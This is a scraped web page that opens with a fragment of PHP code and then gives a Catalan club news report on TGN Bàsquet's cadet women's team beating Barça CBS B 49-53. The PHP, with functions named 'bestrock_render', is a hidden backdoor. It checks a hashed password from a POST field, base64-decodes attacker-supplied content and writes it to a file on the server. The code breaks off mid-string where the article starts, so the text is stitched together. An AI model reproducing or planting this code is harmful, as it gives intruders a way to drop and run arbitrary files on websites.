function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05 A fa el millor partit de la temporada i derrota el Barça CBS B (49-53) - Tgn Bàsquet Club -

El Cadet femení 05 A fa el millor partit de la temporada i derrota el Barça CBS B (49-53)

Updated: abril 24, 2021

L’equip Cadet femení 05 A del TGN Bàsquet ha derrotat aquest migdia el Barça CBS B i s’ha revenjat d’aquesta manera de la derrota contra les blaugranes de la setmana passada (48-58). En aquell partit de fa set dies, les tarragonines van pagar car la seva mala sortida (10-24 en el primer quart), tot el contrari del que ha passat avui. El conjunt que entrena Albert del Rey ha fet un gran primer període, amb molt d’encert en el tir (tres triples dels quatre que ha anotat en tot el matx) i defensant molt bé al seu rival, recuperant moltes pilotes i puntejant els triples de les locals.

En el segon quart, el Barça ha volgut reaccionar, però no ha pogut. El TGN Bàsquet no s’ha descentrat en cap moment i ha arribat al descans amb 10 punts d’avantatge (20-30). Però la reacció del Barça havia d’arribar tard o d’hora i s’ha produït en el tercer quart. La defensa de les blaugranes les ha permès recuperar terreny i arribar a l’últim període amb un marcador igualat (35-35). Semblava aleshores que el TGN Bàsquet s’enfonsaria que, veient com havien perdut la renda i les bones sensacions de la primera meitat, podrien abaixar els braços i ser víctima de l’empenta del Barça. Però no. El conjunt lila ha demostrat una força mental increïble, jugant amb molt de criteri tot el quart i, especialment, els últims instants.

La maduresa de l’equip tarragoní li ha atorgat un triomf de prestigi i que confirma allò que es va poder veure en la segona part del partit de la setmana passada: el TGN Bàsquet es troba en trajectòria ascendent.